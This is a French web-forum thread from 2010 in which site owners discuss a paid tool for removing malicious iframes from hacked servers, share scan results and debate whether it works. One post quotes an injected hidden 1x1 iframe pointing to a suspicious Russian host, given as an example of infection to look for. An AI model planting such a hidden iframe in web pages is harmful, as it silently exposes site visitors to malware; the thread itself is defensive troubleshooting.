Bienvenue, Invité. Veuillez vous connecter ou vous inscrire.
Avez-vous perdu votre courriel d'activation?
*

Iframe.Attack V1.1

Pages: [1]
  Imprimer  

Iframe.Attack V1.1
Auteur Message
kadomino
Apprenti
**

Points gagnés: 0

Iframe.Attack V1.1
« le: 26 Janvier 2010 à 23:16:08 »

Selon le site www.kawablob.com/scarabox/produt.php?id_produit=1&id_rub=2, l'Iframe.Attack permet de faciliter la suppression d'IFRAMES malveillantes sur vos serveurs et cela en quelques clics.

Connaissez-vous ce produit FR mis en service en 2009.

Fiche technique
Auteur  : Scarabox
Titre     : Iframe.Attack v1.1
Année   : 2009
Poids    : 79Ko
Tags     : attaque, FTP, HTML:Iframe-inf, Iframe, Iframe atatque, Ikowin32, index.htm, index.html, index.php, injection, Malware, piratage, server, serveur, ver, virus, visibility:hidden, Win32:Trojan-gen, worm.

L'avez-vous déjà utilisé ?
Qu'en pense-vous ?
Est-il efficace ?
Est-ce une solution ?

Amicalement

Freddy
Journalisée
yvo
Nouveau membre
*

Re : Iframe.Attack V1.1
« Répondre #1 le: 30 Janvier 2010 à 02:15:49 »

Bonjour Kadomino,

J'ai été attaqué par une série de virus qui modifié mes fichiers index.html sur mes serveurs. J'ai pas mal cherché et finalement j'ai acheter ce programme iframe.attack v1.1, ça m'a bien aidé et il ont un bon support technique, j'ai eu un petit souci de configuration sur mon serveur, ils m'ont répondu en moins de 24 h

Le lien que tu as donné est faux, celui-ci marche bien : http://kawablog.com/scarabox/product.php?id_produit=1&id_rub=2

Bonne chance, Yvo

Journalisée
kadomino
Apprenti
**

« Répondre #2 le: 03 Février 2010 à 11:35:43 »

Bonjour Yvo,

Merci pour ta réponse et pour la correction de l'adresse.  J'ai de gros doigts et ai glissé.....
Je crois que je rencontre également un souci de configuration : page introuvable !
J'attends leur réponse.

A bientôt

Freddy
Journalisée
kadomino
Apprenti
**

« Répondre #3 le: 03 Février 2010 à 17:56:11 »

Bonjour,

1. J'ai effectué le scan de mon serveur :
    Le scan a détecté trois iframes :

"admin"/includes/fckeditor.php
1 iframe(s) trouvée(s)
Détail
<iframe id=\"{$this->InstanceName}___Frame\" src=\"{$Link}\" width=\"{$this->Width}\" height=\"{$this->Height}\" frameborder=\"0\" scrolling=\"no\"></iframe>

editors/htmlarea/plugins/SpellChecker/spell-check-ui.html
1 iframe(s) trouvée(s)
Détail
<iframe src="about:blank" width="100%" height="100%" id="i_framecontent" name="framecontent"></iframe>

editors/htmlarea/popups/insert_image.html
1 iframe(s) trouvée(s)
Détail
<iframe name="ipreview" id="ipreview" frameborder="0" style="border : 1px solid gray;" height="200" width="300" src=""></iframe>

Après nettoyage, rien n'a changé.

2. J'ai de nombreux fichiers query_selects_12.....txt, sont-ils utiles ?
Quels sont les fichiers inutiles  (autres que ceux mentionnés par Jean-Luc sur ce forum)

3. Si vous consultez mon site : www.kadomino.com ; il me semble que rien n'a changé.  Toujours ce petit icône "cerf-volant" à gauche lors du chargement des images.  Le voyez-vous ?

« Dernière édition: 03 Février 2010 à 18:06:14 par kadomino » Journalisée
yvo
Nouveau membre
*

« Répondre #4 le: 05 Février 2010 à 01:32:14 »

Bonjour Kadomino,

Je pense pas que tu aurais dû supprimer ces 3 iframes :
<iframe id=\"{$this->InstanceName}___Frame\" src=\"{$Link}\" width=\"{$this->Width}\" height=\"{$this->Height}\" frameborder=\"0\" scrolling=\"no\"></iframe>
<iframe src="about:blank" width="100%" height="100%" id="i_framecontent" name="framecontent"></iframe>
<iframe name="ipreview" id="ipreview" frameborder="0" style="border : 1px solid gray;" height="200" width="300" src=""></iframe>

Celles-ci ne semble pas être des iframes dangereuses d'après moi, mais je peux me tromper ???

Dans mon cas, elles avaient cette syntaxe :
<iframe src="http://www.nombizarre.ru:8080/trucbizarre.php" style="visibility: hidden" height="1" width="1"></iframe>
elles pointaient directement sur un site étrange via le parametre src="

Je pense que tu as supprimé des composants de FCKeditor ? Peut-être quelqu'un de mieux calé pourra te renseigner mieux que moi ??

Concernant le petit cerf-volant, j'ai testé sous FF et IE et je ne vois pas, même en rechargeant la page plusieurs fois, c'est bizarre.

Désolé de pas pouvoir t'aider plus, peut-être que ton problème vient pas d'une Iframe ? mais d'ailleurs ? Shocked
A+++
Yvo
Journalisée
trxproduction
Acharné

« Répondre #5 le: 05 Août 2010 à 18:18:56 »

c'est une arnaque serieux, j'ai un site infester encore de iframe, et j'ai payer ce soft iframeattaack, il me trouve tjs les 3 memes appartenant par default a zencart, le reste il ne les trouve pas pfff

ah mon avis les nouveaux iframe il ne les a pas en memoire et donc ne les trouve pas...

tres decu... quand j'ai 5 minutes je contacterai son proprio
Journalisée
fe1lho
Acharné

« Répondre #6 le: 06 Août 2010 à 13:10:07 »

Si il s'agit de trouver le texte iframe, l'admin fait cela aussi  dans la partie admin> outils >outils du développeur>
En général j'utilise la section : Consultation de tous les fichiers

Pascal
Journalisée

Pages: [1]
  Imprimer  

Aller à: